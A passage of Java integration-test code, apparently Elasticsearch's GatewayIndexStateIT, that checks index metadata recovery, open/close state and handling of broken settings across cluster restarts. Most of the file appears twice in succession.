node"); internalCluster().fullRestart(new RestartCallback(){ @Override public Settings onNodeStopped(String nodeName) { return nonDataNode(); } }); logger.info("--> waiting for test index to be created"); ClusterHealthResponse health = client().admin().cluster().prepareHealth().setWaitForEvents(Priority.LANGUID).setIndices("test") .execute().actionGet(); assertThat(health.isTimedOut(), equalTo(false)); logger.info("--> verify we have an index"); ClusterStateResponse clusterStateResponse = client().admin().cluster().prepareState().setIndices("test").execute().actionGet(); assertThat(clusterStateResponse.getState().metadata().hasIndex("test"), equalTo(true)); } public void testJustMasterNodeAndJustDataNode() { logger.info("--> cleaning nodes"); logger.info("--> starting 1 master node non data"); internalCluster().startMasterOnlyNode(); internalCluster().startDataOnlyNode(); logger.info("--> create an index"); client().admin().indices().prepareCreate("test").execute().actionGet(); client().prepareIndex("test").setSource("field1", "value1").execute().actionGet(); } public void testTwoNodesSingleDoc() throws Exception { logger.info("--> cleaning nodes"); logger.info("--> starting 2 nodes"); internalCluster().startNodes(2); logger.info("--> indexing a simple document"); client().prepareIndex("test").setId("1").setSource("field1", "value1").setRefreshPolicy(IMMEDIATE).get(); logger.info("--> waiting for green status"); ClusterHealthResponse health = client().admin().cluster().prepareHealth().setWaitForEvents(Priority.LANGUID).setWaitForGreenStatus() .setWaitForNodes("2").execute().actionGet(); assertThat(health.isTimedOut(), equalTo(false)); logger.info("--> verify 1 doc in the index"); for (int i = 0; i < 10; i++) { assertHitCount(client().prepareSearch().setQuery(matchAllQuery()).get(), 1L); } logger.info("--> closing test index..."); assertAcked(client().admin().indices().prepareClose("test")); ClusterStateResponse stateResponse = client().admin().cluster().prepareState().execute().actionGet(); assertThat(stateResponse.getState().metadata().index("test").getState(), equalTo(IndexMetadata.State.CLOSE)); assertThat(stateResponse.getState().routingTable().index("test"), notNullValue()); logger.info("--> opening the index..."); client().admin().indices().prepareOpen("test").execute().actionGet(); logger.info("--> waiting for green status"); health = client().admin().cluster().prepareHealth().setWaitForEvents(Priority.LANGUID).setWaitForGreenStatus().setWaitForNodes("2") .execute().actionGet(); assertThat(health.isTimedOut(), equalTo(false)); logger.info("--> verify 1 doc in the index"); assertHitCount(client().prepareSearch().setQuery(matchAllQuery()).get(), 1L); for (int i = 0; i < 10; i++) { assertHitCount(client().prepareSearch().setQuery(matchAllQuery()).get(), 1L); } } /** * This test ensures that when an index deletion takes place while a node is offline, when that * node rejoins the cluster, it deletes the index locally instead of importing it as a dangling index. */ public void testIndexDeletionWhenNodeRejoins() throws Exception { final String indexName = "test-index-del-on-node-rejoin-idx"; final int numNodes = 2; final List<String> nodes; logger.info("--> starting a cluster with " + numNodes + " nodes"); nodes = internalCluster().startNodes(numNodes, Settings.builder().put(IndexGraveyard.SETTING_MAX_TOMBSTONES.getKey(), randomIntBetween(10, 100)).build()); logger.info("--> create an index"); createIndex(indexName); logger.info("--> waiting for green status"); ensureGreen(); final String indexUUID = resolveIndex(indexName).getUUID(); logger.info("--> restart a random date node, deleting the index in between stopping and restarting"); internalCluster().restartRandomDataNode(new RestartCallback() { @Override public Settings onNodeStopped(final String nodeName) throws Exception { nodes.remove(nodeName); logger.info("--> stopped node[{}], remaining nodes {}", nodeName, nodes); assert nodes.size() > 0; final String otherNode = nodes.get(0); logger.info("--> delete index and verify it is deleted"); final Client client = client(otherNode); client.admin().indices().prepareDelete(indexName).execute().actionGet(); assertFalse(indexExists(indexName, client)); logger.info("--> index deleted"); return super.onNodeStopped(nodeName); } }); logger.info("--> wait until all nodes are back online"); client().admin().cluster().health(Requests.clusterHealthRequest().waitForEvents(Priority.LANGUID) .waitForNodes(Integer.toString(numNodes))).actionGet(); logger.info("--> waiting for green status"); ensureGreen(); logger.info("--> verify that the deleted index is removed from the cluster and not reimported as dangling by the restarted node"); assertFalse(indexExists(indexName)); assertBusy(() -> { final NodeEnvironment nodeEnv = internalCluster().getInstance(NodeEnvironment.class); try { assertFalse("index folder " + indexUUID + " should be deleted", nodeEnv.availableIndexFolders().contains(indexUUID)); } catch (IOException e) { logger.error("Unable to retrieve available index folders from the node", e); fail("Unable to retrieve available index folders from the node"); } }); } /** * This test really tests worst case scenario where we have a broken setting or any setting that prevents an index from being * allocated in our metadata that we recover. In that case we now have the ability to check the index on local recovery from disk * if it is sane and if we can successfully create an IndexService. This also includes plugins etc. */ public void testRecoverBrokenIndexMetadata() throws Exception { logger.info("--> starting one node"); internalCluster().startNode(); logger.info("--> indexing a simple document"); client().prepareIndex("test").setId("1").setSource("field1", "value1").setRefreshPolicy(IMMEDIATE).get(); logger.info("--> waiting for green status"); if (usually()) { ensureYellow(); } else { internalCluster().startNode(); client().admin().cluster() .health(Requests.clusterHealthRequest() .waitForGreenStatus() .waitForEvents(Priority.LANGUID) .waitForNoRelocatingShards(true).waitForNodes("2")).actionGet(); } ClusterState state = client().admin().cluster().prepareState().get().getState(); final IndexMetadata metadata = state.getMetadata().index("test"); final IndexMetadata.Builder brokenMeta = IndexMetadata.builder(metadata).settings(Settings.builder().put(metadata.getSettings()) .put(IndexMetadata.SETTING_VERSION_CREATED, Version.CURRENT.minimumIndexCompatibilityVersion().id) // this is invalid but should be archived .put("index.similarity.BM25.type", "boolean") // this one is not validated ahead of time and breaks allocation .put("index.analysis.filter.myCollator.type", "icu_collation")); restartNodesOnBrokenClusterState(ClusterState.builder(state).metadata(Metadata.builder(state.getMetadata()).put(brokenMeta))); // check that the cluster does not keep reallocating shards assertBusy(() -> { final RoutingTable routingTable = client().admin().cluster().prepareState().get().getState().routingTable(); final IndexRoutingTable indexRoutingTable = routingTable.index("test"); assertNotNull(indexRoutingTable); for (IndexShardRoutingTable shardRoutingTable : indexRoutingTable) { assertTrue(shardRoutingTable.primaryShard().unassigned()); assertEquals(UnassignedInfo.AllocationStatus.DECIDERS_NO, shardRoutingTable.primaryShard().unassignedInfo().getLastAllocationStatus()); assertThat(shardRoutingTable.primaryShard().unassignedInfo().getNumFailedAllocations(), greaterThan(0)); } }, 60, TimeUnit.SECONDS); client().admin().indices().prepareClose("test").get(); state = client().admin().cluster().prepareState().get().getState(); assertEquals(IndexMetadata.State.CLOSE, state.getMetadata().index(metadata.getIndex()).getState()); assertEquals("boolean", state.getMetadata().index(metadata.getIndex()).getSettings().get("archived.index.similarity.BM25.type")); // try to open it with the broken setting - fail again! ElasticsearchException ex = expectThrows(ElasticsearchException.class, () -> client().admin().indices().prepareOpen("test").get()); assertEquals(ex.getMessage(), "Failed to verify index " + metadata.getIndex()); assertNotNull(ex.getCause()); assertEquals(IllegalArgumentException.class, ex.getCause().getClass()); assertEquals(ex.getCause().getMessage(), "Unknown filter type [icu_collation] for [myCollator]"); } /** * This test really tests worst case scenario where we have a missing analyzer setting. * In that case we now have the ability to check the index on local recovery from disk * if it is sane and if we can successfully create an IndexService. * This also includes plugins etc. */ public void testRecoverMissingAnalyzer() throws Exception { logger.info("--> starting one node"); internalCluster().startNode(); prepareCreate("test").setSettings(Settings.builder() .put("index.analysis.analyzer.test.tokenizer", "standard") .put("index.number_of_shards", "1")) .setMapping("{\n" + " \"properties\": {\n" + " \"field1\": {\n" + " \"type\": \"text\",\n" + " \"analyzer\": \"test\"\n" + " }\n" + " }\n" + " }}").get(); logger.info("--> indexing a simple document"); client().prepareIndex("test").setId("1").setSource("field1", "value one").setRefreshPolicy(IMMEDIATE).get(); logger.info("--> waiting for green status"); if (usually()) { ensureYellow(); } else { internalCluster().startNode(); client().admin().cluster() .health(Requests.clusterHealthRequest() .waitForGreenStatus() .waitForEvents(Priority.LANGUID) .waitForNoRelocatingShards(true).waitForNodes("2")).actionGet(); } ClusterState state = client().admin().cluster().prepareState().get().getState(); final IndexMetadata metadata = state.getMetadata().index("test"); final IndexMetadata.Builder brokenMeta = IndexMetadata.builder(metadata).settings(metadata.getSettings() .filter((s) -> "index.analysis.analyzer.test.tokenizer".equals(s) == false)); restartNodesOnBrokenClusterState(ClusterState.builder(state).metadata(Metadata.builder(state.getMetadata()).put(brokenMeta))); // check that the cluster does not keep reallocating shards assertBusy(() -> { final RoutingTable routingTable = client().admin().cluster().prepareState().get().getState().routingTable(); final IndexRoutingTable indexRoutingTable = routingTable.index("test"); assertNotNull(indexRoutingTable); for (IndexShardRoutingTable shardRoutingTable : indexRoutingTable) { assertTrue(shardRoutingTable.primaryShard().unassigned()); assertEquals(UnassignedInfo.AllocationStatus.DECIDERS_NO, shardRoutingTable.primaryShard().unassignedInfo().getLastAllocationStatus()); assertThat(shardRoutingTable.primaryShard().unassignedInfo().getNumFailedAllocations(), greaterThan(0)); } }, 60, TimeUnit.SECONDS); client().admin().indices().prepareClose("test").get(); // try to open it with the broken setting - fail again! ElasticsearchException ex = expectThrows(ElasticsearchException.class, () -> client().admin().indices().prepareOpen("test").get()); assertEquals(ex.getMessage(), "Failed to verify index " + metadata.getIndex()); assertNotNull(ex.getCause()); assertEquals(MapperParsingException.class, ex.getCause().getClass()); assertThat(ex.getCause().getMessage(), containsString("analyzer [test] has not been configured in mappings")); } public void testArchiveBrokenClusterSettings() throws Exception { logger.info("--> starting one node"); internalCluster().startNode(); client().prepareIndex("test").setId("1").setSource("field1", "value1").setRefreshPolicy(IMMEDIATE).get(); logger.info("--> waiting for green status"); if (usually()) { ensureYellow(); } else { internalCluster().startNode(); client().admin().cluster() .health(Requests.clusterHealthRequest() .waitForGreenStatus() .waitForEvents(Priority.LANGUID) .waitForNoRelocatingShards(true).waitForNodes("2")).actionGet(); } ClusterState state = client().admin().cluster().prepareState().get().getState(); final Metadata metadata = state.getMetadata(); final Metadata brokenMeta = Metadata.builder(metadata).persistentSettings(Settings.builder() .put(metadata.persistentSettings()).put("this.is.unknown", true) .put(ShardLimitValidator.SETTING_CLUSTER_MAX_SHARDS_PER_NODE.getKey(), "broken").build()).build(); restartNodesOnBrokenClusterState(ClusterState.builder(state).metadata(brokenMeta)); ensureYellow("test"); // wait for state recovery state = client().admin().cluster().prepareState().get().getState(); assertEquals("true", state.metadata().persistentSettings().get("archived.this.is.unknown")); assertEquals("broken", state.metadata().persistentSettings().get("archived." + ShardLimitValidator.SETTING_CLUSTER_MAX_SHARDS_PER_NODE.getKey())); // delete these settings client().admin().cluster().prepareUpdateSettings().setPersistentSettings(Settings.builder().putNull("archived.*")).get(); state = client().admin().cluster().prepareState().get().getState(); assertNull(state.metadata().persistentSettings().get("archived.this.is.unknown")); assertNull(state.metadata().persistentSettings().get("archived." + ShardLimitValidator.SETTING_CLUSTER_MAX_SHARDS_PER_NODE.getKey())); assertHitCount(client().prepareSearch().setQuery(matchAllQuery()).get(), 1L); } public void testHalfDeletedIndexImport() throws Exception { // It's possible for a 6.x node to add a tombstone for an index but not actually delete the index metadata from disk since that // deletion is slightly deferred and may race against the node being shut down; if you upgrade to 7.x when in this state then the // node won't start. final String nodeName = internalCluster().startNode(); createIndex("test", Settings.builder() .put(IndexMetadata.SETTING_NUMBER_OF_SHARDS, 1) .put(IndexMetadata.SETTING_NUMBER_OF_REPLICAS, 0) .build()); ensureGreen("test"); final Metadata metadata = internalCluster().getInstance(ClusterService.class).state().metadata(); final Path[] paths = internalCluster().getInstance(NodeEnvironment.class).nodeDataPaths(); final String nodeId = client().admin().cluster().prepareNodesInfo(nodeName).clear().get().getNodes().get(0).getNode().getId(); writeBrokenMeta(metaStateService -> { for (final Path path : paths) { IOUtils.rm(path.resolve(PersistedClusterStateService.METADATA_DIRECTORY_NAME)); } metaStateService.writeGlobalState("test", Metadata.builder(metadata) // we remove the manifest file, resetting the term and making this look like an upgrade from 6.x, so must also reset the // term in the coordination metadata .coordinationMetadata(CoordinationMetadata.builder(metadata.coordinationMetadata()).term(0L).build()) // add a tombstone but do not delete the index metadata from disk .putCustom(IndexGraveyard.TYPE, IndexGraveyard.builder().addTombstone(metadata.index("test").getIndex()).build()).build()); NodeMetadata.FORMAT.writeAndCleanup(new NodeMetadata(nodeId, Version.CURRENT), paths); }); ensureGreen(); assertBusy(() -> assertThat(internalCluster().getInstance(NodeEnvironment.class).availableIndexFolders(), empty())); } private void writeBrokenMeta(CheckedConsumer<MetaStateService, IOException> writer) throws Exception { Map<String, MetaStateService> metaStateServices = Stream.of(internalCluster().getNodeNames()) .collect(Collectors.toMap(Function.identity(), nodeName -> internalCluster().getInstance(MetaStateService.class, nodeName))); internalCluster().fullRestart(new RestartCallback(){ @Override public Settings onNodeStopped(String nodeName) throws Exception { final MetaStateService metaStateService = metaStateServices.get(nodeName); writer.accept(metaStateService); return super.onNodeStopped(nodeName); } }); } private void restartNodesOnBrokenClusterState(ClusterState.Builder clusterStateBuilder) throws Exception { Map<String, PersistedClusterStateService> lucenePersistedStateFactories = Stream.of(internalCluster().getNodeNames()) .collect(Collectors.toMap(Function.identity(), nodeName -> internalCluster().getInstance(PersistedClusterStateService.class, nodeName))); final ClusterState clusterState = clusterStateBuilder.build(); internalCluster().fullRestart(new RestartCallback(){ @Override public Settings onNodeStopped(String nodeName) throws Exception { final PersistedClusterStateService lucenePersistedStateFactory = lucenePersistedStateFactories.get(nodeName); try (PersistedClusterStateService.Writer writer = lucenePersistedStateFactory.createWriter()) { writer.writeFullStateAndCommit(clusterState.term(), clusterState); } return super.onNodeStopped(nodeName); } }); } }
server/src/internalClusterTest/java/org/elasticsearch/gateway/GatewayIndexStateIT.java
/* * Licensed to Elasticsearch under one or more contributor * license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright * ownership. Elasticsearch licenses this file to you under * the Apache License, Version 2.0 (the "License"); you may * not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.elasticsearch.gateway; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; import org.elasticsearch.ElasticsearchException; import org.elasticsearch.Version; import org.elasticsearch.action.admin.cluster.health.ClusterHealthResponse; import org.elasticsearch.action.admin.cluster.state.ClusterStateResponse; import org.elasticsearch.action.get.GetResponse; import org.elasticsearch.action.support.ActiveShardCount; import org.elasticsearch.client.Client; import org.elasticsearch.client.Requests; import org.elasticsearch.cluster.ClusterState; import org.elasticsearch.cluster.metadata.IndexGraveyard; import org.elasticsearch.cluster.metadata.IndexMetadata; import org.elasticsearch.cluster.metadata.MappingMetadata; import org.elasticsearch.cluster.metadata.Metadata; import org.elasticsearch.cluster.routing.IndexRoutingTable; import org.elasticsearch.cluster.routing.IndexShardRoutingTable; import org.elasticsearch.cluster.routing.RoutingTable; import org.elasticsearch.cluster.routing.ShardRoutingState; import org.elasticsearch.cluster.routing.UnassignedInfo; import org.elasticsearch.cluster.service.ClusterService; import org.elasticsearch.common.Priority; import org.elasticsearch.common.settings.Settings; import org.elasticsearch.common.xcontent.XContentFactory; import org.elasticsearch.env.NodeEnvironment; import org.elasticsearch.index.mapper.MapperParsingException; import org.elasticsearch.indices.IndexClosedException; import org.elasticsearch.indices.ShardLimitValidator; import org.elasticsearch.test.ESIntegTestCase; import org.elasticsearch.test.ESIntegTestCase.ClusterScope; import org.elasticsearch.test.ESIntegTestCase.Scope; import org.elasticsearch.test.InternalTestCluster.RestartCallback; import java.io.IOException; import java.nio.file.Path; import java.util.List; import java.util.Map; import java.util.concurrent.TimeUnit; import java.util.function.Function; import java.util.stream.Collectors; import java.util.stream.Stream; import static org.elasticsearch.action.support.WriteRequest.RefreshPolicy.IMMEDIATE; import static org.elasticsearch.index.query.QueryBuilders.matchAllQuery; import static org.elasticsearch.test.NodeRoles.nonDataNode; import static org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertAcked; import static org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertHitCount; import static org.hamcrest.Matchers.containsString; import static org.hamcrest.Matchers.empty; import static org.hamcrest.Matchers.equalTo; import static org.hamcrest.Matchers.greaterThan; import static org.hamcrest.Matchers.notNullValue; @ClusterScope(scope = Scope.TEST, numDataNodes = 0) public class GatewayIndexStateIT extends ESIntegTestCase { private final Logger logger = LogManager.getLogger(GatewayIndexStateIT.class); @Override protected boolean addMockInternalEngine() { // testRecoverBrokenIndexMetadata replies on the flushing on shutdown behavior which can be randomly disabled in MockInternalEngine. return false; } public void testMappingMetadataParsed() throws Exception { logger.info("--> starting 1 nodes"); internalCluster().startNode(); logger.info("--> creating test index, with meta routing"); client().admin().indices().prepareCreate("test") .setMapping(XContentFactory.jsonBuilder().startObject().startObject("_doc").startObject("_routing") .field("required", true).endObject().endObject().endObject()) .execute().actionGet(); logger.info("--> verify meta _routing required exists"); MappingMetadata mappingMd = client().admin().cluster().prepareState().execute().actionGet().getState().metadata() .index("test").mapping(); assertThat(mappingMd.routingRequired(), equalTo(true)); logger.info("--> restarting nodes..."); internalCluster().fullRestart(); logger.info("--> waiting for yellow status"); ensureYellow(); logger.info("--> verify meta _routing required exists"); mappingMd = client().admin().cluster().prepareState().execute().actionGet().getState().metadata().index("test").mapping(); assertThat(mappingMd.routingRequired(), equalTo(true)); } public void testSimpleOpenClose() throws Exception { logger.info("--> starting 2 nodes"); internalCluster().startNodes(2); logger.info("--> creating test index"); createIndex("test"); NumShards test = getNumShards("test"); logger.info("--> waiting for green status"); ensureGreen(); ClusterStateResponse stateResponse = client().admin().cluster().prepareState().execute().actionGet(); assertThat(stateResponse.getState().metadata().index("test").getState(), equalTo(IndexMetadata.State.OPEN)); assertThat(stateResponse.getState().routingTable().index("test").shards().size(), equalTo(test.numPrimaries)); assertThat(stateResponse.getState().routingTable().index("test").shardsWithState(ShardRoutingState.STARTED).size(), equalTo(test.totalNumShards)); logger.info("--> indexing a simple document"); client().prepareIndex("test").setId("1").setSource("field1", "value1").get(); logger.info("--> closing test index..."); assertAcked(client().admin().indices().prepareClose("test")); stateResponse = client().admin().cluster().prepareState().execute().actionGet(); assertThat(stateResponse.getState().metadata().index("test").getState(), equalTo(IndexMetadata.State.CLOSE)); assertThat(stateResponse.getState().routingTable().index("test"), notNullValue()); logger.info("--> verifying that the state is green"); ensureGreen(); logger.info("--> trying to index into a closed index ..."); try { client().prepareIndex("test").setId("1").setSource("field1", "value1").execute().actionGet(); fail(); } catch (IndexClosedException e) { // all is well } logger.info("--> creating another index (test2) by indexing into it"); client().prepareIndex("test2").setId("1").setSource("field1", "value1").execute().actionGet(); logger.info("--> verifying that the state is green"); ensureGreen(); logger.info("--> opening the first index again..."); assertAcked(client().admin().indices().prepareOpen("test")); logger.info("--> verifying that the state is green"); ensureGreen(); stateResponse = client().admin().cluster().prepareState().execute().actionGet(); assertThat(stateResponse.getState().metadata().index("test").getState(), equalTo(IndexMetadata.State.OPEN)); assertThat(stateResponse.getState().routingTable().index("test").shards().size(), equalTo(test.numPrimaries)); assertThat(stateResponse.getState().routingTable().index("test").shardsWithState(ShardRoutingState.STARTED).size(), equalTo(test.totalNumShards)); logger.info("--> trying to get the indexed document on the first index"); GetResponse getResponse = client().prepareGet("test", "1").execute().actionGet(); assertThat(getResponse.isExists(), equalTo(true)); logger.info("--> closing test index..."); assertAcked(client().admin().indices().prepareClose("test")); stateResponse = client().admin().cluster().prepareState().execute().actionGet(); assertThat(stateResponse.getState().metadata().index("test").getState(), equalTo(IndexMetadata.State.CLOSE)); assertThat(stateResponse.getState().routingTable().index("test"), notNullValue()); logger.info("--> restarting nodes..."); internalCluster().fullRestart(); logger.info("--> waiting for two nodes and green status"); ensureGreen(); stateResponse = client().admin().cluster().prepareState().execute().actionGet(); assertThat(stateResponse.getState().metadata().index("test").getState(), equalTo(IndexMetadata.State.CLOSE)); assertThat(stateResponse.getState().routingTable().index("test"), notNullValue()); logger.info("--> trying to index into a closed index ..."); try { client().prepareIndex("test").setId("1").setSource("field1", "value1").execute().actionGet(); fail(); } catch (IndexClosedException e) { // all is well } logger.info("--> opening index..."); client().admin().indices().prepareOpen("test").execute().actionGet(); logger.info("--> waiting for green status"); ensureGreen(); stateResponse = client().admin().cluster().prepareState().execute().actionGet(); assertThat(stateResponse.getState().metadata().index("test").getState(), equalTo(IndexMetadata.State.OPEN)); assertThat(stateResponse.getState().routingTable().index("test").shards().size(), equalTo(test.numPrimaries)); assertThat(stateResponse.getState().routingTable().index("test").shardsWithState(ShardRoutingState.STARTED).size(), equalTo(test.totalNumShards)); logger.info("--> trying to get the indexed document on the first round (before close and shutdown)"); getResponse = client().prepareGet("test", "1").execute().actionGet(); assertThat(getResponse.isExists(), equalTo(true)); logger.info("--> indexing a simple document"); client().prepareIndex("test").setId("2").setSource("field1", "value1").execute().actionGet(); } public void testJustMasterNode() throws Exception { logger.info("--> cleaning nodes"); logger.info("--> starting 1 master node non data"); internalCluster().startNode(nonDataNode()); logger.info("--> create an index"); client().admin().indices().prepareCreate("test").setWaitForActiveShards(ActiveShardCount.NONE).execute().actionGet(); logger.info("--> restarting master node"); internalCluster().fullRestart(new RestartCallback(){ @Override public Settings onNodeStopped(String nodeName) { return nonDataNode(); } }); logger.info("--> waiting for test index to be created"); ClusterHealthResponse health = client().admin().cluster().prepareHealth().setWaitForEvents(Priority.LANGUID).setIndices("test") .execute().actionGet(); assertThat(health.isTimedOut(), equalTo(false)); logger.info("--> verify we have an index"); ClusterStateResponse clusterStateResponse = client().admin().cluster().prepareState().setIndices("test").execute().actionGet(); assertThat(clusterStateResponse.getState().metadata().hasIndex("test"), equalTo(true)); } public void testJustMasterNodeAndJustDataNode() { logger.info("--> cleaning nodes"); logger.info("--> starting 1 master node non data"); internalCluster().startMasterOnlyNode(); internalCluster().startDataOnlyNode(); logger.info("--> create an index"); client().admin().indices().prepareCreate("test").execute().actionGet(); client().prepareIndex("test").setSource("field1", "value1").execute().actionGet(); } public void testTwoNodesSingleDoc() throws Exception { logger.info("--> cleaning nodes"); logger.info("--> starting 2 nodes"); internalCluster().startNodes(2); logger.info("--> indexing a simple document"); client().prepareIndex("test").setId("1").setSource("field1", "value1").setRefreshPolicy(IMMEDIATE).get(); logger.info("--> waiting for green status"); ClusterHealthResponse health = client().admin().cluster().prepareHealth().setWaitForEvents(Priority.LANGUID).setWaitForGreenStatus() .setWaitForNodes("2").execute().actionGet(); assertThat(health.isTimedOut(), equalTo(false)); logger.info("--> verify 1 doc in the index"); for (int i = 0; i < 10; i++) { assertHitCount(client().prepareSearch().setQuery(matchAllQuery()).get(), 1L); } logger.info("--> closing test index..."); assertAcked(client().admin().indices().prepareClose("test")); ClusterStateResponse stateResponse = client().admin().cluster().prepareState().execute().actionGet(); assertThat(stateResponse.getState().metadata().index("test").getState(), equalTo(IndexMetadata.State.CLOSE)); assertThat(stateResponse.getState().routingTable().index("test"), notNullValue()); logger.info("--> opening the index..."); client().admin().indices().prepareOpen("test").execute().actionGet(); logger.info("--> waiting for green status"); health = client().admin().cluster().prepareHealth().setWaitForEvents(Priority.LANGUID).setWaitForGreenStatus().setWaitForNodes("2") .execute().actionGet(); assertThat(health.isTimedOut(), equalTo(false)); logger.info("--> verify 1 doc in the index"); assertHitCount(client().prepareSearch().setQuery(matchAllQuery()).get(), 1L); for (int i = 0; i < 10; i++) { assertHitCount(client().prepareSearch().setQuery(matchAllQuery()).get(), 1L); } } /** * This test ensures that when an index deletion takes place while a node is offline, when that * node rejoins the cluster, it deletes the index locally instead of importing it as a dangling index. */ public void testIndexDeletionWhenNodeRejoins() throws Exception { final String indexName = "test-index-del-on-node-rejoin-idx"; final int numNodes = 2; final List<String> nodes; logger.info("--> starting a cluster with " + numNodes + " nodes"); nodes = internalCluster().startNodes(numNodes, Settings.builder().put(IndexGraveyard.SETTING_MAX_TOMBSTONES.getKey(), randomIntBetween(10, 100)).build()); logger.info("--> create an index"); createIndex(indexName); logger.info("--> waiting for green status"); ensureGreen(); final String indexUUID = resolveIndex(indexName).getUUID(); logger.info("--> restart a random date node, deleting the index in between stopping and restarting"); internalCluster().restartRandomDataNode(new RestartCallback() { @Override public Settings onNodeStopped(final String nodeName) throws Exception { nodes.remove(nodeName); logger.info("--> stopped node[{}], remaining nodes {}", nodeName, nodes); assert nodes.size() > 0; final String otherNode = nodes.get(0); logger.info("--> delete index and verify it is deleted"); final Client client = client(otherNode); client.admin().indices().prepareDelete(indexName).execute().actionGet(); assertFalse(indexExists(indexName, client)); logger.info("--> index deleted"); return super.onNodeStopped(nodeName); } }); logger.info("--> wait until all nodes are back online"); client().admin().cluster().health(Requests.clusterHealthRequest().waitForEvents(Priority.LANGUID) .waitForNodes(Integer.toString(numNodes))).actionGet(); logger.info("--> waiting for green status"); ensureGreen(); logger.info("--> verify that the deleted index is removed from the cluster and not reimported as dangling by the restarted node"); assertFalse(indexExists(indexName)); assertBusy(() -> { final NodeEnvironment nodeEnv = internalCluster().getInstance(NodeEnvironment.class); try { assertFalse("index folder " + indexUUID + " should be deleted", nodeEnv.availableIndexFolders().contains(indexUUID)); } catch (IOException e) { logger.error("Unable to retrieve available index folders from the node", e); fail("Unable to retrieve available index folders from the node"); } }); } /** * This test really tests worst case scenario where we have a broken setting or any setting that prevents an index from being * allocated in our metadata that we recover. In that case we now have the ability to check the index on local recovery from disk * if it is sane and if we can successfully create an IndexService. This also includes plugins etc. */ public void testRecoverBrokenIndexMetadata() throws Exception { logger.info("--> starting one node"); internalCluster().startNode(); logger.info("--> indexing a simple document"); client().prepareIndex("test").setId("1").setSource("field1", "value1").setRefreshPolicy(IMMEDIATE).get(); logger.info("--> waiting for green status"); if (usually()) { ensureYellow(); } else { internalCluster().startNode(); client().admin().cluster() .health(Requests.clusterHealthRequest() .waitForGreenStatus() .waitForEvents(Priority.LANGUID) .waitForNoRelocatingShards(true).waitForNodes("2")).actionGet(); } ClusterState state = client().admin().cluster().prepareState().get().getState(); final IndexMetadata metadata = state.getMetadata().index("test"); final IndexMetadata.Builder brokenMeta = IndexMetadata.builder(metadata).settings(Settings.builder().put(metadata.getSettings()) .put(IndexMetadata.SETTING_VERSION_CREATED, Version.CURRENT.minimumIndexCompatibilityVersion().id) // this is invalid but should be archived .put("index.similarity.BM25.type", "boolean") // this one is not validated ahead of time and breaks allocation .put("index.analysis.filter.myCollator.type", "icu_collation")); restartNodesOnBrokenClusterState(ClusterState.builder(state).metadata(Metadata.builder(state.getMetadata()).put(brokenMeta))); // check that the cluster does not keep reallocating shards assertBusy(() -> { final RoutingTable routingTable = client().admin().cluster().prepareState().get().getState().routingTable(); final IndexRoutingTable indexRoutingTable = routingTable.index("test"); assertNotNull(indexRoutingTable); for (IndexShardRoutingTable shardRoutingTable : indexRoutingTable) { assertTrue(shardRoutingTable.primaryShard().unassigned()); assertEquals(UnassignedInfo.AllocationStatus.DECIDERS_NO, shardRoutingTable.primaryShard().unassignedInfo().getLastAllocationStatus()); assertThat(shardRoutingTable.primaryShard().unassignedInfo().getNumFailedAllocations(), greaterThan(0)); } }, 60, TimeUnit.SECONDS); client().admin().indices().prepareClose("test").get(); state = client().admin().cluster().prepareState().get().getState(); assertEquals(IndexMetadata.State.CLOSE, state.getMetadata().index(metadata.getIndex()).getState()); assertEquals("boolean", state.getMetadata().index(metadata.getIndex()).getSettings().get("archived.index.similarity.BM25.type")); // try to open it with the broken setting - fail again! ElasticsearchException ex = expectThrows(ElasticsearchException.class, () -> client().admin().indices().prepareOpen("test").get()); assertEquals(ex.getMessage(), "Failed to verify index " + metadata.getIndex()); assertNotNull(ex.getCause()); assertEquals(IllegalArgumentException.class, ex.getCause().getClass()); assertEquals(ex.getCause().getMessage(), "Unknown filter type [icu_collation] for [myCollator]"); } /** * This test really tests worst case scenario where we have a missing analyzer setting. * In that case we now have the ability to check the index on local recovery from disk * if it is sane and if we can successfully create an IndexService. * This also includes plugins etc. */ public void testRecoverMissingAnalyzer() throws Exception { logger.info("--> starting one node"); internalCluster().startNode(); prepareCreate("test").setSettings(Settings.builder() .put("index.analysis.analyzer.test.tokenizer", "standard") .put("index.number_of_shards", "1")) .setMapping("{\n" + " \"properties\": {\n" + " \"field1\": {\n" + " \"type\": \"text\",\n" + " \"analyzer\": \"test\"\n" + " }\n" + " }\n" + " }}").get(); logger.info("--> indexing a simple document"); client().prepareIndex("test").setId("1").setSource("field1", "value one").setRefreshPolicy(IMMEDIATE).get(); logger.info("--> waiting for green status"); if (usually()) { ensureYellow(); } else { internalCluster().startNode(); client().admin().cluster() .health(Requests.clusterHealthRequest() .waitForGreenStatus() .waitForEvents(Priority.LANGUID) .waitForNoRelocatingShards(true).waitForNodes("2")).actionGet(); } ClusterState state = client().admin().cluster().prepareState().get().getState(); final IndexMetadata metadata = state.getMetadata().index("test"); final IndexMetadata.Builder brokenMeta = IndexMetadata.builder(metadata).settings(metadata.getSettings() .filter((s) -> "index.analysis.analyzer.test.tokenizer".equals(s) == false)); restartNodesOnBrokenClusterState(ClusterState.builder(state).metadata(Metadata.builder(state.getMetadata()).put(brokenMeta))); // check that the cluster does not keep reallocating shards assertBusy(() -> { final RoutingTable routingTable = client().admin().cluster().prepareState().get().getState().routingTable(); final IndexRoutingTable indexRoutingTable = routingTable.index("test"); assertNotNull(indexRoutingTable); for (IndexShardRoutingTable shardRoutingTable : indexRoutingTable) { assertTrue(shardRoutingTable.primaryShard().unassigned()); assertEquals(UnassignedInfo.AllocationStatus.DECIDERS_NO, shardRoutingTable.primaryShard().unassignedInfo().getLastAllocationStatus()); assertThat(shardRoutingTable.primaryShard().unassignedInfo().getNumFailedAllocations(), greaterThan(0)); } }, 60, TimeUnit.SECONDS); client().admin().indices().prepareClose("test").get(); // try to open it with the broken setting - fail again! ElasticsearchException ex = expectThrows(ElasticsearchException.class, () -> client().admin().indices().prepareOpen("test").get()); assertEquals(ex.getMessage(), "Failed to verify index " + metadata.getIndex()); assertNotNull(ex.getCause()); assertEquals(MapperParsingException.class, ex.getCause().getClass()); 